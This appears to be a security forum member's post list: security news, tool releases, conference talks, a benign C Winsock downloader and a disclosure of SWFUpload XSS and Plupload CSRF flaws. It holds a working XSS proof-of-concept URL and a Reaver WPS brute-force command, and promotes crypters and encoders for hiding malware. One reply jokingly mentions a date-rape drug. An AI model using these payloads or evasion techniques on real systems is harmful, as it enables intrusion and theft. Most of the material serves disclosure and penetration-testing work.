Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18795

  • Joined

  • Last visited

  • Days Won

    743

 Content Type 

Everything posted by Nytro

  1. Nytro
    [h=1]FBI Opens Investigation into Stuxnet Attack Leaks[/h]Wednesday, June 06, 2012 The Wall Street Journal reports that the Federal Bureau of Investigation is now probing the source of recently leaked information regarding covert cyber operations conducted by the U.S. government. Last week New York Times' writer David Sanger published a piece detailing the government's use of a sophisticated cyber weapon known as Stuxnet, which emerged in 2010. Stuxnet is a complex virus that infected systems which provide operations control for Iranian production networks, and was most likely produced to stifle Iran's nuclear weapons program. Stuxnet targeted Siemens Programmable Logic Controllers (PLCs) and is thought to have caused severe damage to equipment at Iranian uranium enrichment facilities, setting back the nation's weapons program by as much as several years. Stuxnet is largely considered to be a game changer in the world of information security, as the infection did not merely cause problems with the tainted systems, but actually affected kinetic damage on the equipment those systems controlled. The modular nature of the design behind Stuxnet and its data stealing cousins Duqu and Flame could mean that new variations of the viruses tailored to target critical components of other systems could already be in development. Senator John McCain of Arizona suggested that the leaks may have been intentional on the part of the White House in "an attempt to further the president's political ambitions for the sake of his re-election at the expense of our national security." White House spokesman Josh Earnest rebutted the speculation, stating "It's classified for a reason, because publicizing that information would pose a significant threat to national security." Sanger also dismissed McCain's assertion, saying "I spent a year working the story from the bottom up, and then went to the administration and told them what I had. Then they had to make some decisions about how much they wanted to talk about it…I'm sure the political side of the White House probably likes reading about the president acting with drones and cyber and so forth. National-security side has got very mixed emotions about it because these are classified programs." In late May, Secretary of State Hillary Clinton disclosed news that U.S. cyber operatives had recently hacked pro al-Qaeda propaganda websites in Yemen. The operation focused on changing violently anti-American content by injecting data related to the terrorist organization's crimes again Yemeni citizens, including death tolls. The operation was initiated by the State Department as part of a multi-agency counter-terrorism strategy aimed at disrupting al-Qaeda's online recruitment and propaganda efforts. The targets were websites controlled by the terrorist faction Yemen’s al Qaida in the Arabian Peninsula (AQAP) who has recently stepped up anti-American propaganda and online recruitment efforts. The disclosure, though not on par with the leaking of the Stuxnet attacks, was nonetheless unusual. For the most part, the Pentagon’s U.S. Cyber Command usually carries out cyber offensives, though they are rarely acknowledged publicly. Sursa: FBI Opens Investigation into Stuxnet Attack Leaks
  2. Nytro

    Ajutor Winsock (C)

    Nytro replied to Elf's topic in Programare

    Bun, sa vedem ce se poate face. Pe scurt, trebuie sa te conectezi pe portul 8081 (in cazul tau) prin TCP la acel host (127.0.0.1) si sa folosesti protocolul HTTP (versiunea 1.1) pentru a cere (GET) acea pagina. Pentru inceput, conteaza daca programul este pentru Windows sau pentru Linux. Pentru Windows, in primul rand, va trebui sa apelezi la inceput functia WSAStartUp() pentru initializarea Winsock (stack-ul de comunicatie Windows, unde ai nevoie de un pointer la o structura WSADATA, trimisa prin referinta, ce va contine ulterior informatii despre Winsock si de versiunea Winsock, 2.2 probabil). WSAStartup(MAKEWORD(2,2), &wsaData) Iar la final va trebui sa apelezi WSACleanup();. Imi e lene sa explic mai multe, uite ce am scris eu mai demult: /* Nume: FileDownloader v0.1 Autor: Ionut Popescu Data: 12-13 Noiembrie 2011 Descriere: Descarca un fisier de la URL-ul specificat in locatia specificata */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #include <winsock2.h> #define WIN32_LEAN_AND_MEAN /* Prototipurile functiilor */ void InitWinsock(); char *GetServer(const char *url); char *GetIP(const char *server); char *BuildHTTPRequest(const char *url); int DownloadFile(const char *url, const char *filename); /* Functia descarca un fisier de la adresa specificata */ int DownloadFile(const char *url, const char *filename) { char *request = NULL, *server = NULL, *server_ip = NULL, recv_buffer[4096]; SOCKET sock; struct sockaddr_in conn; int eroare_connect = -1, rez_send = -1, rez_recv = -1, bytes = 0, first_packet = 1; /* Cream request-ul, si memoram IP-ul serverului */ request = BuildHTTPRequest(url); server = GetServer(url); server_ip = GetIP(server); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); /* Verificam crearea socketului */ if(sock == INVALID_SOCKET) { puts("Eroare, nu s-a putut crea socketul"); if(WSAGetLastError() == WSAENETDOWN) puts("- Problema cu conexiunea la internet"); exit(EXIT_FAILURE); } /* Facem "setarile" necesare si ne conectam la server */ conn.sin_family = AF_INET; conn.sin_port = htons(80); conn.sin_addr.s_addr = inet_addr(server_ip); eroare_connect = connect(sock, (struct sockaddr *)&conn, sizeof(conn)); /* Verificam daca s-a realizat conexiunea */ if(eroare_connect == SOCKET_ERROR) { puts("Eroare la conectarea la server"); eroare_connect = WSAGetLastError(); switch(eroare_connect) { case WSAENETDOWN: puts("- Problema cu conexiunea la internet"); break; case WSAEADDRNOTAVAIL: puts("- Adresa nu este valida"); break; case WSAECONNREFUSED: puts("- Conexiunea a fost refuzata"); break; case WSAENETUNREACH: puts("- Nu s-a putut realiza conexiunea la retea"); break; case WSAEHOSTUNREACH: puts("- Nu s-a putut realiza conexiunea la server"); break; case WSAETIMEDOUT: puts("- Conexiunea a esuat dupa timpul limita"); break; default: printf("- A intervenit eroarea cu codul: %d\n", eroare_connect); } closesocket(sock); exit(EXIT_FAILURE); } /* Trimitem request-ul */ rez_send = send(sock, request, strlen(request), 0); if(rez_send == SOCKET_ERROR) { puts("Eroare la trimiterea request-ului"); rez_send = WSAGetLastError(); switch(rez_send) { case WSAENETDOWN: puts("- Problema cu conexiunea la internet"); break; case WSAECONNABORTED: puts("- Conexiunea a fost terminata dupa timpul limita"); break; case WSAECONNRESET: puts("- Conexiunea a fost resetata de server"); break; case WSAETIMEDOUT: puts("- Conexiune inchisa din cauza retelei sau serverului respectiv"); break; default: printf("- A intervenit eroarea cu codul: %d\n", rez_send); } } /* Nu mai trimitem date */ shutdown(sock, SD_SEND); /* Citim raspunsul de la server */ do { bytes = recv(sock, recv_buffer, 4096, 0); if(bytes > 0) { /* Daca e primul pachet, separam datele de headerele HTTP */ if(first_packet == 1) { char *header = recv_buffer; char delim[5] = {0}; int pos_buf = 0; /* Prevenim eventuale probleme */ //if(strlen(recv_buffer) < 4) continue; sprintf(delim, "\r\n\r\n"); //while(recv_buffer[pos_buf+4] && (strncmp(&recv_buffer[pos_buf], delim, 4) != 0)) pos_buf++; printf("%s", &recv_buffer[0]); //break; first_packet = 0; } else puts(recv_buffer); break; } else if(bytes == 0) { puts(recv_buffer); } else { puts("Eroare la citirea datelor de la server"); rez_recv = WSAGetLastError(); switch(rez_recv) { case WSAENETDOWN: puts("- Problema cu conexiunea la internet"); break; case WSAECONNABORTED: puts("- Conexiunea a fost terminata dupa timpul limita"); break; case WSAECONNRESET: puts("- Conexiunea a fost resetata de server"); break; case WSAETIMEDOUT: puts("- Conexiune inchisa din cauza retelei sau serverului respectiv"); break; default: printf("- A intervenit eroarea cu codul: %d\n", eroare_connect); } } } while(bytes > 0); closesocket(sock); return 1; } /* Functia returneaza IP-ul unui server */ char* GetIP(const char *server) { struct hostent *host; struct in_addr address; host = gethostbyname(server); /* Verificam rezultatul */ if(host == NULL) { int eroare_ip = -1; puts("A intervenit o eroare la preluarea IP-ului serverului"); switch(eroare_ip = WSAGetLastError()) { case WSAHOST_NOT_FOUND: puts("- Serverul nu a fost gasit"); break; case WSANO_DATA: puts("- Nu a fost gasit niciun IP pentru server"); break; default: printf("- A intervenit eroarea cu codul: %d\n", eroare_ip); } exit(EXIT_FAILURE); } /* Verificare si conversie */ if(host->h_addr_list[0] == 0) { puts("Eroare, nu s-a gasit niciun IP pentru server"); exit(EXIT_FAILURE); } /* Convertim reprezentarea*/ address.s_addr = *(u_long*)host->h_addr_list[0]; /* address = *(struct in_addr*)(host->h_addr_list[0]); */ /* Convertim adresa la sir de caractere si o returnam */ return inet_ntoa(address); } /* Functia construieste headerele HTTP necesare, memoram serverul in al doilea parametru */ char *BuildHTTPRequest(const char *url) { const char browser[] = "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"; char *request = NULL, *local_url = NULL, *host = NULL; char fileurl[1024]; /* Prevenim buffer oveflow */ if(strlen(url) > 1024) return NULL; host = GetServer(url); local_url = (char *)malloc(1024); /* Extragem si numele fisierului */ if(strncmp(url, "http://", 7) == 0) strcpy(local_url, url +7); else strcpy(local_url, url); strcpy(fileurl, local_url + strlen(host)); /* Alocam spatiu si cream headerul */ request = (char *)malloc(4096); sprintf(request, "GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\n\r\n", fileurl, host, browser); return request; } /* Functia returneaza serverul dintr-un URL */ char *GetServer(const char *url) { char *local_url = NULL, *host = NULL; int i = 0; /* Prevenim buffer oveflow */ if(strlen(url) >= 1024) return NULL; /* Extragem datele necesare pentru a crea headerul */ local_url = (char *)malloc(1024); if(strncmp(url, "http://", 7) == 0) strcpy(local_url, url +7); else strcpy(local_url, url); /* Copiem serverul in variabila host */ host = (char *)malloc(1024); while(local_url[i] && local_url[i] != '/') { host[i] = local_url[i]; i++; } host[i] = '\0'; return host; } /* Alocam resursele Winsock si verificam pentru potentiale erori */ void InitWinsock() { WSADATA wsaData; /* Initializare Winsock */ if(WSAStartup(MAKEWORD(2,2), &wsaData)) { int eroare_wsa = -1; puts("A intervenit o eroare la initializarea Winsock:"); switch(eroare_wsa = WSAGetLastError()) { case WSASYSNOTREADY: puts("- Problema cu conexiunea la Internet"); break; case WSAEPROCLIM : puts("- Problema cu resursele alocate de sistemul de operare"); break; default: printf("- A intervenit eroarea cu codul: %d\n\n", eroare_wsa); } exit(EXIT_FAILURE); } } /* Main-ul clasic */ int main() { InitWinsock(); DownloadFile("http://www.un.org/Depts/Cartographic/map/profile/romania.pdf", NULL); WSACleanup(); return 0; } E destul de explicat, ar trebui sa se inteleaga. Apoi, am mai scris prima parte pentru un astfel de articol: http://www.codexpert.ro/articole.php?id=33 Si azi am facut un client UDPv6, pe un anumit IPv6, daca ai nevoie de ceva informatii, intreaba-ma.
  3. Nytro
    [h=4]Iphone Dns Spoofing , Arp Poisoning Redirecting Websites[/h] Description: Using Arp poisoning, All Your ARP Are Belong To Us! The ability to associate any IP address with any MAC address provides hackers with many attack vectors, including Denial of Service, Man in the Middle, and MAC Flooding. Sursa: Iphone Dns Spoofing , Arp Poisoning Redirecting Websites
  4. Nytro
    [h=4]Refud Using Hex Editor (Work All Rat Crypter Keylogger Worm Bot Etc)[/h] http://www.youtube.com/watch?feature=player_embedded&v=34JuwNg9ECU Description: Perkongsian Ilmu Komputer | computer knowledge sharing: RE-FUD (under REFUD section) This method is hard . patient is needed This refud technique work with all stub ,crypter .net depencies , no dependencies ,worm ,trojan , all rat server ,keylogger ,stealer, botnet ,etc. For detail step, information and DOWNLOAD stuff... available at link below.. Perkongsian Ilmu Komputer | computer knowledge sharing: RE-FUD (under REFUD section) Sursa: Refud Using Hex Editor (Work All Rat Crypter Keylogger Worm Bot Etc)
  5. Nytro
    [h=4]Automated Persistent Backdoor On Metasploit Framework[/h] Description: In This Video You will learn how to create automating persistent backdoors on our target using metasploit. After the exploitation Persistent backdoors works like RAT and accept all reverse https connections. And Watch this video How to create undetectable backdoors Video :- How To Create An Undetectable Backdoor (Bt5R2), Make Undetectable Backdoor Using Crypter.Py, How To Create An Undetectable Backdoor (Bt5R2) Sursa: Automated Persistent Backdoor On Metasploit Framework
  6. Nytro
    [h=4]Backtrack 5 R2 Manual Sqlsus[/h] Description: SqlSus is an open source mysql injection and takeover tool. Using command line interface, we can retrieve the database structure, and we can inject our own SQL queries. we can download file from the web server, crawl the website. etc ... Tool :- Sqlsus - SecurityTube Tools Sursa: Backtrack 5 R2 Manual Sqlsus
  7. Nytro
    [h=4]Flame Malware: An Overview[/h] Description: This video, with Sourcefire Chief Scientist Zulfikar Ramzan, provides a high-level description of the Flame (AKA Flamer, sKyWIPer) malware toolkit that appears to be a state-sponsored cyberweapon. Flame has similarities to other threats like Duqu and Stuxnet, but primarily functions as an infostealer. Sursa: Flame Malware: An Overview
  8. Nytro
    [h=4]Metasploit With Microsoft Sql Server And Smb Exploits (Part 1/2)[/h] Description: A heap-based buffer overflow can occur when calling the undocumented "sp_replwritetovarbin" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a "jmp esp". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner. This video shows how to use Metasploit to gain access to a computer using a vulnerability in Microsoft SQL Server (1st step) and then using an SMB vulnerability (2nd step) to get administrative privileges. See part 2 for the exploitation of the access Sursa: Metasploit With Microsoft Sql Server And Smb Exploits (Part 1/2)
  9. Nytro
    [h=2]XSS and CSRF via SWF Applets (SWFUpload, Plupload)[/h]Via: Defcamp [h=3]Summary[/h] Nathan Partlan and I discovered and reported vulnerabilities in two common Flash applets, SWFUpload and Plupload. SWFUpload’s developers have not released a fix for the XSS issue identified. Plupload’s developers have released v1.5.4 to address the identified CSRF issue. Both of these applets are present in WordPress installations. These vulnerabilities were addressed as part of WordPress 3.3.2. [h=3]Vulnerability #1: XSS in SWFUpload[/h] The latest version of SWFUpload (ActionScript code available here) contains the following code: // Get the movie name this.movieName = root.loaderInfo.parameters.movieName; // **Configure the callbacks** // The JavaScript tracks all the instances of SWFUpload on a page. We can access the instance // associated with this SWF file using the movieName. Each callback is accessible by making // a call directly to it on our instance. There is no error handling for undefined callback functions. // A developer would have to deliberately remove the default functions,set the variable to null, or remove // it from the init function. this.flashReady_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].flashReady"; this.fileDialogStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogStart"; this.fileQueued_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueued"; this.fileQueueError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileQueueError"; this.fileDialogComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].fileDialogComplete"; this.uploadStart_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadStart"; this.uploadProgress_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadProgress"; this.uploadError_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadError"; this.uploadSuccess_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadSuccess"; this.uploadComplete_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].uploadComplete"; this.debug_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].debug"; this.testExternalInterface_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].testExternalInterface"; this.cleanUp_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].cleanUp"; this.buttonAction_Callback = "SWFUpload.instances[\"" + this.movieName + "\"].buttonAction"; Each of those callbacks is used as the first parameter to ExternalInterface.call, which executes JavaScript in the context of the current page. Since movieName is derived from user input (a Flash parameter) and a Flash applet can be loaded directly (with parameters in the URL), the Flash applet allows for reflected cross-site scripting. For sites where the applet is hosted on the same domain as the main website, this is a serious security concern. At this point, I’m not aware of a patched version of the applet source (let me know in the comments if there is one!). My suggestion would be to filter the movieName parameter so that only alpha-numeric characters are allowed. Proof of Concept: [URL="http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=%22]%29;%7Dcatch%28e%29%7B%7Dif%28%21self.a%29self.a=%21alert%281%29;//"]http://demo.swfupload.org/v220/swfupload/swfupload.swf?movieName=%22]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//[/URL] [h=3]Vulnerability #2: CSRF in Plupload[/h] The Plupload applet called Security.allowDomain('*') to allow the applet to be used from any domain (so it could be served from S3, for instance). That meant people could interact with the Plupload applet from any other site on the Internet by embedding it on a page and using JavaScript. But due to the way the same-origin policy works in Flash, the applet could still make requests back to the domain on which it was hosted. In addition, people can specify the full URL for an upload request via JavaScript and the result of that request (ie: the HTML of the resulting page) is passed back via JavaScript to the embedding page. So, if an attacker could convince a target to interact with the applet (by selecting a single file to be uploaded), the attacker could make a request to the domain that the applet was hosted on and read back the full response. That could disclose CSRF tokens or other sensitive information. This issue was especially important for WordPress installations, where Plupload applets are hosted inside of the wp-includes directory by default. The issue was resolved by removing the call to Security.allowDomain('*') by default. [h=3]Conclusion[/h] Third-party Flash applets are vulnerable to many of the same sorts of attacks as other parts of web applications. However, they are often included in sites without a proper understanding of the security risks. Sursa: https://nealpoole.com/blog/2012/05/xss-and-csrf-via-swf-applets-swfupload-plupload/
  10. Nytro
    Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files Posted by FlashcRew at 14:33 Via: Defcamp Carbylamine PHP Encoder is a PHP Encoder to 'Obfuscate/Encode' PHP File, Faster way to encode your malwares offline. How to use: carbylamine.php Download carbylamine Home project it's here Sursa: Carbylamine - A PHP Script Encoder to 'Obfuscate/Encode' PHP Files | fLaShcRew
  11. Nytro
    [h=2]Wireshark: Listening to VoIP Conversations from Packet Captures[/h]Author: ~ by D. Dieterle on May 21, 2012. I have never done a lot with “Voice over IP” or VoIP systems, but ran into this today and thought it was pretty cool. A lot of telephones and communication devices now use VoIP to communicate over the internet. I was wondering how hard it would be to listen to a VoIP phone call if you had a packet capture that included the call. How hard would it be, I wondered, to scan a packet capture, find the calls and be able to somehow listen to the call. Well, come to find out, it is not hard at all. The feature is built into Wireshark! And they also include a file capture on their website so you can try it out. So…. Let’s do it! 1. Download the sample capture from Wireshark’s website. 2. Run Wireshark and open the packet capture. 3. Now all you need to do is go to the menu bar, select “Telephony” and the “VoIP Calls”: 4. Okay, a list of calls from the packet capture will show up. Pick the one you want to listen to, in this sample the first one is the only one that really has a conversation: 5. Okay, easy peasy, just select the call you want, click “Player” then “Decode”: 6. The player screen shows up and shows the Waveforms of the conversation. You will have two, one for each side of the call. You can listen to each side individually, or if you tick both check boxes you can listen to the conversation as it plays out: That’s it, if the VoIP conversation is in a protocol that WireShark understands, and is not encrypted, you can very simply isolate the call and listen to it via WireShark. As always, do not try these techniques on a network or on systems that you do not have permission to do so. Also, check your local laws regarding communication privacy and telephony before trying something like this in real life. Sursa: Wireshark: Listening to VoIP Conversations from Packet Captures
  12. Nytro
    Naspa, mai bine cautati si voi GHB (drogul violului)
  13. Nytro
    Bsides London 2012 David Rook: Windows Phone 7 platform and application security overview David Rook aka @SecurityNinja gives an overview on the Windows Phone 7 platform and application security overview at security Bsides London 2012 at the Barbican. The slides can be seen here: SecurityBSides London - windows phone 7
  14. Nytro
    [h=1]Gavin Ewan - A salesmans guide to social engineering[/h] At Bsides London 2012, Gavin Ewan gives a Salesmans Guide to Social Engineering. Slides area available at: bit.ly/J3rVck Thanks to our media sponsors, Twist & Shout for recording our video on the day.
  15. Nytro
    [h=1]Arron "Finux" Finnon[/h] At Bsides London 2012, Arron "Finux" Finnon presents UPnP - The Useful plug and pwn protocol - revisited
  16. Nytro
    [h=1]Bsides London 2012, Robin Wood - "Breaking into Security"[/h] At Security Bsides London 2012, Robin (@digininja) Wood answers the oft-asked question of, "How do I get into information security" or "how do I become a pen tester" Videos thanks to our media sponsors Twist & Shout
  17. Nytro
    [h=1]Bsides London 2012, Dave Hartley SAP Slapping A Pen Testers Guide[/h] At Bsides London 2012, Dave Hartley gives a pen testers guide to SAP. Slides can be downloaded from: SAP Slapping - MWR Labs Thanks to our media sponsors Twist & Shout for the videos on the day
  18. Nytro
    [h=1]BeEF 0.4.3.5![/h]by Mayuresh on June 5, 2012 Our first post regarding BeEF can be found here. A few hours, an updated version – BeEF version 0.4.3.5 – has was made available to us! “BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target. BeEF hooks one or more web browsers as beachheads for the launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals. BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Development has focused on creating a modular framework. This has made module development a very quick and simple process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.“ [h=2]Changes made to BeEF 0.4.3.5:[/h] Experimental support for WebSockets as an alternative communication channel has been added. The server-side handlers are event-based for performance reasons, and right now it works smoothly in Chrome/Safari and Firefox latest versions. To give it a try, modify beef.http.websocket.enable to true in the main config.yaml file. Using WebSockets the communication is much faster, especially when dealing with large requests (Tunneling Proxy) or an high number of command modules. The WebSockets work is a joint effort between Graziano Felline and Michele. Experimental support for obfuscation has also been added. Disabled by default, enable the extension at beef.extension.evasion.enable at the end of the main config.yaml file if you want to play with it. The purpose of the extension is to reduce the likelihood that the BeEF hook will be detected by RegEx’es and Layer 7 filters. Obviously a manual analysis (a la sla.ckers) will reveal the goodness, but still the extension enables you to combine and chain multiple techniques as you most like it. Right now, when enabled, the main hook file and the code sent with modules is scrambled (random string substitution), minified and base64?ed. A couple of XSRF modules for the Huawei SmartAX MT880 router and the Dlink DCS series camera were added. The Deface Web Page module was updated to change the page title and favicon. The first BeEF clickjacking module that can be used as a template for more specific attacks: an invisible iframe follows the mouse cursor. Right now, this works in Firefox and Chrome, but not yet in Internet Explorer. A Cross-Site Printing (XSP) module that allows you to print to printers with port 9100 open has also been added. By default, this prints BeEF ASCII art. As with the social engineering modules, a module that prompts the user to install a fake Flash player update which is really a malicious Chrome extension has also been added. This is very nice because the extension can issue CrossDomain requests, have access to tabs, and be the launch point for other modules: Inject BeEF in all tabs, steal Google contacts, or a new one Mike added recently to steal all cookies from all tabs, including those marked with the HttpOnly flag. A Mobile Safari iOS 5.1 Address Bar Spoofing module, the Glassfish WAR upload module through XSRF, the frame sniffing module using LeakyFrame, the Heretic Clippy code and a Netgear GS108T managed switch XSRF module have also been added. All thanks to Bart Leppens, Nick Freeman, Denis Andzakovic, Christian Frichot, Mike Haworth, Brendan and Antisnatchor! [h=3]Download BeEF 0.4.3.5:[/h] BeEF 0.4.3.5 - beef-latest-alpha.tar.gz/beef-0.4.3.5.zip – https://github.com/beefproject/beef/zipball/beef-0.4.3.5 Sursa: BeEF version 0.4.3.5! — PenTestIT
  19. Nytro
    Science of Cyber-Security JASON The MITRE Corporation 7515 Colshire Drive McLean, Virginia 22102-7508 (703) Contact: D, McMorrow - dmcmorro w@mi tre.org November 2010 Approved for public release; distribution unlimited Contents 1 EXECUTIVE SUMMARY 1 2 PROBLEM STATEMENT AND INTRODUCTION 9 3 CYBER-SECURITY AS SCIENCE – An Overview 13 3.1 Attributes for Cyber-Security . . . . . . . . . . . . . . . . . . . . 14 3.2 Guidance from other Sciences . . . . . . . . . . . . . . . . . . . 15 3.2.1 Economics . . . . . . . . . . . . . . . . . . . . . . . . . 16 3.2.2 Meteorology . . . . . . . . . . . . . . . . . . . . . . . . 16 3.2.3 Medicine . . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.2.4 Astronomy . . . . . . . . . . . . . . . . . . . . . . . . . 17 3.2.5 Agriculture . . . . . . . . . . . . . . . . . . . . . . . . . 18 3.3 Security Degrades Over Time . . . . . . . . . . . . . . . . . . . . 18 3.3.1 Unix passwords . . . . . . . . . . . . . . . . . . . . . . . 18 3.3.2 Lock bumping . . . . . . . . . . . . . . . . . . . . . . . 19 3.4 The Role of Secrecy . . . . . . . . . . . . . . . . . . . . . . . . . 20 3.5 Aspects of the Science of Cyber-Security . . . . . . . . . . . . . 22 3.6 Some Science . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.1 Trust . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.2 Cryptography . . . . . . . . . . . . . . . . . . . . . . . . 23 3.6.3 Game theory . . . . . . . . . . . . . . . . . . . . . . . . 24 3.6.4 Model checking . . . . . . . . . . . . . . . . . . . . . . . 26 3.6.5 Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . 26 3.6.6 Machine learning . . . . . . . . . . . . . . . . . . . . . . 27 3.6.7 Composition of components . . . . . . . . . . . . . . . . 27 3.7 Applying the Fruits of Science . . . . . . . . . . . . . . . . . . . 28 3.8 Metrics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 3.9 The Opportunities of New Technologies . . . . . . . . . . . . . . 32 3.10 Experiments and Data . . . . . . . . . . . . . . . . . . . . . . . . 34 4 MODEL CHECKING 37 4.1 Brief Introduction to Spin and Promela . . . . . . . . . . . . . . . 38 4.2 Application to Security . . . . . . . . . . . . . . . . . . . . . . . 42 4.2.1 The Needham-Schroeder Protocol . . . . . . . . . . . . . 43 4.2.2 Promela model of the protocol . . . . . . . . . . . . . . . 45 4.3 Scaling Issues . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 iii 4.4 Extracting Models from Code . . . . . . . . . . . . . . . . . . . 52 4.5 Relationship to Hyper-Properties . . . . . . . . . . . . . . . . . . 53 5 THE IMMUNE SYSTEM ANALOGY 65 5.1 Basic Biology . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65 5.2 Learning from the Analogy . . . . . . . . . . . . . . . . . . . . . 68 5.2.1 The need for adaptive response . . . . . . . . . . . . . . . 69 5.2.2 A mix of sensing modalities . . . . . . . . . . . . . . . . 70 5.2.3 The need for controlled experiments . . . . . . . . . . . . 71 5.2.4 Time scale differences . . . . . . . . . . . . . . . . . . . 73 5.2.5 Responses to detection . . . . . . . . . . . . . . . . . . . 74 5.2.6 Final points . . . . . . . . . . . . . . . . . . . . . . . . . 75 6 CONCLUSIONS AND RECOMMENDATIONS 77 A APPENDIX: Briefers 85 Download: http://www.fas.org/irp/agency/dod/jason/cyber.pdf
  20. Nytro

    Firefox 13

    Nytro posted a topic in Programe utile

    Firefox 13 [h=1]Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier[/h] June 5th, 2012 · Firefox Firefox makes it faster and easier to get where you want to go on the Web with a redesigned Home Page and New Tab experience. The Home Page now includes icons at the bottom of the page to give you easy access to bookmarks, history, settings, add-ons, downloads and sync preferences with one-click shortcuts. When you open a new tab, you’ll see thumbnails of your most recently and frequently visited sites. You can customize the New Tab page by adding or removing thumbnails based on where you go most. Click the screenshot to learn more! Firefox loads tabs on demand when restoring a browsing session to more quickly get you to Web pages. Firefox first loads the tab you are currently viewing, then loads background tabs when you click them. It’s an improvement that makes Firefox start faster and use less memory. This is just one of a series of performance improvements to Firefox responsiveness. Firefox supports SPDY by default to make browsing more secure. SPDY is a protocol designed as a successor to HTTP that reduces the amount of time it takes for websites to load. You will notice faster page load times on sites that support SPDY networking, like Google and Twitter. With this support, Firefox is available to an estimated 15 million native Khmer speakers around the world, in addition to the millions that already use Firefox in more than 85 languages worldwide. For more information: Download Firefox for Windows, Mac and Linux Firefox for Windows, Mac and Linux detailed release notes Sursa: Firefox Has a Redesigned Home Page and New Tab Experience That Make Browsing the Web Faster and Easier | The Mozilla Blog
  21. Nytro
    SSLsplit - Transparent and Scalable SSL/TLS Interceptor SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. It terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing. SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, it generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. It can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit supports a number of NAT engines, static forwarding and SNI DNS lookups to determine the original destination of redirected connections. SSLsplit currently supports the following NAT engines: OpenBSD packet filter (pf) – also available on FreeBSD and NetBSD FreeBSD IP firewall (IPFW) – also available on Mac OS X IPFilter (ipfilter, ipf), available on many systems, including FreeBSD, NetBSD, Linux and Solaris Linux netfilter (netfilter) Linux netfilter using the iptables TPROXY (tproxy) Download Sslsplit 0.4.4 Sursa: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools
  22. Nytro
    Reaver v1.4 - WPS Brute force attack against Wifi The WiFi Protected Setup protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours. Screenshot: http://2.bp.blogspot.com/-x1sTEFZqpvU/T85ITbIGQ3I/AAAAAAAAGfE/Dqh7dgJUGvY/s1600/Reaver+v1.4+-+WPS+Brute+force+attack+against+Wifi.jpg Usage is simple; just specify the target BSSID and the monitor mode interface to use: # reaver -i mon0 -b 00:01:02:03:04:05 For those interested, there is also a commercial version available with more features and speed improvements. On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase. Download Reaver v1.4 Sursa: SSLsplit - Transparent and Scalable SSL/TLS Interceptor | Security, Hacking and Penetration Testing Tools
  23. Nytro
